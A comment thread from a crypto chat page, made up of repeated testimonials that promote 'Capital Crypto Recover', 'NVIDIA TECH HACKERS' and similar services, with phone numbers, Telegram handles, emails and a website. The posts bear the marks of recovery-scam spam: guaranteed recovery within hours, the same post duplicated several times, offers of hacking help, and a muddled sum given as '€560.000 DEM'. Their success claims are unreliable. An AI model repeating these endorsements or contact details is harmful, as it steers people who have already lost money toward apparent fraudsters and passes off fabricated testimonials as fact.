https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 13.10.25 01:11 elizabethrush89

    God bless Capital Crypto Recover Services for the marvelous work you did in my life, I have learned the hard way that even the most sensible investors can fall victim to scams. When my USD was stolen, for anyone who has fallen victim to one of the bitcoin binary investment scams that are currently ongoing, I felt betrayal and upset. But then I was reading a post on site when I saw a testimony of Wendy Taylor online who recommended that Capital Crypto Recovery has helped her recover scammed funds within 24 hours. after reaching out to this cyber security firm that was able to help me recover my stolen digital assets and bitcoin. I’m genuinely blown away by their amazing service and professionalism. I never imagined I’d be able to get my money back until I complained to Capital Crypto Recovery Services about my difficulties and gave all of the necessary paperwork. I was astounded that it took them 12 hours to reclaim my stolen money back. Without a doubt, my USDT assets were successfully recovered from the scam platform, Thank you so much Sir, I strongly recommend Capital Crypto Recover for any of your bitcoin recovery, digital funds recovery, hacking, and cybersecurity concerns. You reach them Call/Text Number +1 (336)390-6684 His Email: [email protected] Contact Telegram: @Capitalcryptorecover Via Contact: [email protected] His website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 14.10.25 01:15 tyleradams

    Hi. Please be wise, do not make the same mistake I had made in the past, I was a victim of bitcoin scam, I saw a glamorous review showering praises and marketing an investment firm, I reached out to them on what their contracts are, and I invested $28,000, which I was promised to get my first 15% profit in weeks, when it’s time to get my profits, I got to know the company was bogus, they kept asking me to invest more and I ran out of patience then requested to have my money back, they refused to answer nor refund my funds, not until a friend of mine introduced me to the NVIDIA TECH HACKERS, so I reached out and after tabling my complaints, they were swift to action and within 36 hours I got back my funds with the due profit. I couldn’t contain the joy in me. I urge you guys to reach out to NVIDIA TECH HACKERS on their email: [email protected]

  • 14.10.25 08:46 robertalfred175

    CRYPTO SCAM RECOVERY SUCCESSFUL – A TESTIMONIAL OF LOST PASSWORD TO YOUR DIGITAL WALLET BACK. My name is Robert Alfred, Am from Australia. I’m sharing my experience in the hope that it helps others who have been victims of crypto scams. A few months ago, I fell victim to a fraudulent crypto investment scheme linked to a broker company. I had invested heavily during a time when Bitcoin prices were rising, thinking it was a good opportunity. Unfortunately, I was scammed out of $120,000 AUD and the broker denied me access to my digital wallet and assets. It was a devastating experience that caused many sleepless nights. Crypto scams are increasingly common and often involve fake trading platforms, phishing attacks, and misleading investment opportunities. In my desperation, a friend from the crypto community recommended Capital Crypto Recovery Service, known for helping victims recover lost or stolen funds. After doing some research and reading multiple positive reviews, I reached out to Capital Crypto Recovery. I provided all the necessary information—wallet addresses, transaction history, and communication logs. Their expert team responded immediately and began investigating. Using advanced blockchain tracking techniques, they were able to trace the stolen Dogecoin, identify the scammer’s wallet, and coordinate with relevant authorities to freeze the funds before they could be moved. Incredibly, within 24 hours, Capital Crypto Recovery successfully recovered the majority of my stolen crypto assets. I was beyond relieved and truly grateful. Their professionalism, transparency, and constant communication throughout the process gave me hope during a very difficult time. If you’ve been a victim of a crypto scam, I highly recommend them with full confidence contacting: 📧 Email: [email protected] 📱 Telegram: @Capitalcryptorecover Contact: [email protected] 📞 Call/Text: +1 (336) 390-6684 🌐 Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 14.10.25 08:46 robertalfred175

    CRYPTO SCAM RECOVERY SUCCESSFUL – A TESTIMONIAL OF LOST PASSWORD TO YOUR DIGITAL WALLET BACK. My name is Robert Alfred, Am from Australia. I’m sharing my experience in the hope that it helps others who have been victims of crypto scams. A few months ago, I fell victim to a fraudulent crypto investment scheme linked to a broker company. I had invested heavily during a time when Bitcoin prices were rising, thinking it was a good opportunity. Unfortunately, I was scammed out of $120,000 AUD and the broker denied me access to my digital wallet and assets. It was a devastating experience that caused many sleepless nights. Crypto scams are increasingly common and often involve fake trading platforms, phishing attacks, and misleading investment opportunities. In my desperation, a friend from the crypto community recommended Capital Crypto Recovery Service, known for helping victims recover lost or stolen funds. After doing some research and reading multiple positive reviews, I reached out to Capital Crypto Recovery. I provided all the necessary information—wallet addresses, transaction history, and communication logs. Their expert team responded immediately and began investigating. Using advanced blockchain tracking techniques, they were able to trace the stolen Dogecoin, identify the scammer’s wallet, and coordinate with relevant authorities to freeze the funds before they could be moved. Incredibly, within 24 hours, Capital Crypto Recovery successfully recovered the majority of my stolen crypto assets. I was beyond relieved and truly grateful. Their professionalism, transparency, and constant communication throughout the process gave me hope during a very difficult time. If you’ve been a victim of a crypto scam, I highly recommend them with full confidence contacting: 📧 Email: [email protected] 📱 Telegram: @Capitalcryptorecover Contact: [email protected] 📞 Call/Text: +1 (336) 390-6684 🌐 Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 14.10.25 08:46 robertalfred175

    CRYPTO SCAM RECOVERY SUCCESSFUL – A TESTIMONIAL OF LOST PASSWORD TO YOUR DIGITAL WALLET BACK. My name is Robert Alfred, Am from Australia. I’m sharing my experience in the hope that it helps others who have been victims of crypto scams. A few months ago, I fell victim to a fraudulent crypto investment scheme linked to a broker company. I had invested heavily during a time when Bitcoin prices were rising, thinking it was a good opportunity. Unfortunately, I was scammed out of $120,000 AUD and the broker denied me access to my digital wallet and assets. It was a devastating experience that caused many sleepless nights. Crypto scams are increasingly common and often involve fake trading platforms, phishing attacks, and misleading investment opportunities. In my desperation, a friend from the crypto community recommended Capital Crypto Recovery Service, known for helping victims recover lost or stolen funds. After doing some research and reading multiple positive reviews, I reached out to Capital Crypto Recovery. I provided all the necessary information—wallet addresses, transaction history, and communication logs. Their expert team responded immediately and began investigating. Using advanced blockchain tracking techniques, they were able to trace the stolen Dogecoin, identify the scammer’s wallet, and coordinate with relevant authorities to freeze the funds before they could be moved. Incredibly, within 24 hours, Capital Crypto Recovery successfully recovered the majority of my stolen crypto assets. I was beyond relieved and truly grateful. Their professionalism, transparency, and constant communication throughout the process gave me hope during a very difficult time. If you’ve been a victim of a crypto scam, I highly recommend them with full confidence contacting: 📧 Email: [email protected] 📱 Telegram: @Capitalcryptorecover Contact: [email protected] 📞 Call/Text: +1 (336) 390-6684 🌐 Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 15.10.25 18:07 crypto

    Cryptocurrency's digital realm presents many opportunities, but it also conceals complex frauds. It is quite painful to lose your cryptocurrency to scam. You can feel harassed and lost as a result. If you have been the victim of a cryptocurrency scam, this guide explains what to do ASAP. Following these procedures will help you avoid further issues or get your money back. Communication with Marie ([email protected] and WhatsApp: +1 7127594675) can make all the difference.

  • 15.10.25 21:52 harristhomas7376

    "In the crypto world, this is great news I want to share. Last year, I fell victim to a scam disguised as a safe investment option. I have invested in crypto trading platforms for about 10yrs thinking I was ensuring myself a retirement income, only to find that all my assets were either frozen, I believed my assets were secure — until I discovered that my BTC funds had been frozen and withdrawals were impossible. It was a devastating moment when I realized I had been scammed, and I thought my Bitcoin was gone forever, Everything changed when a close friend recommended the Capital Crypto Recover Service. Their professionalism, expertise, and dedication enabled me to recover my lost Bitcoin funds back — more than €560.000 DEM to my BTC wallet. What once felt impossible became a reality thanks to their support. If you have lost Bitcoin through scams, hacking, failed withdrawals, or similar challenges, don’t lose hope. I strongly recommend Capital Crypto Recover Service to anyone seeking a reliable and effective solution for recovering any wallet assets. They have a proven track record of successful reputation in recovering lost password assets for their clients and can help you navigate the process of recovering your funds. Don’t let scammers get away with your hard-earned money – contact Email: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Contact: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 15.10.25 21:52 harristhomas7376

    "In the crypto world, this is great news I want to share. Last year, I fell victim to a scam disguised as a safe investment option. I have invested in crypto trading platforms for about 10yrs thinking I was ensuring myself a retirement income, only to find that all my assets were either frozen, I believed my assets were secure — until I discovered that my BTC funds had been frozen and withdrawals were impossible. It was a devastating moment when I realized I had been scammed, and I thought my Bitcoin was gone forever, Everything changed when a close friend recommended the Capital Crypto Recover Service. Their professionalism, expertise, and dedication enabled me to recover my lost Bitcoin funds back — more than €560.000 DEM to my BTC wallet. What once felt impossible became a reality thanks to their support. If you have lost Bitcoin through scams, hacking, failed withdrawals, or similar challenges, don’t lose hope. I strongly recommend Capital Crypto Recover Service to anyone seeking a reliable and effective solution for recovering any wallet assets. They have a proven track record of successful reputation in recovering lost password assets for their clients and can help you navigate the process of recovering your funds. Don’t let scammers get away with your hard-earned money – contact Email: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Contact: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

Для участия в Чате вам необходим бесплатный аккаунт pro-blockchain.com Войти Регистрация
Есть вопросы?
С вами на связи 24/7
Help Icon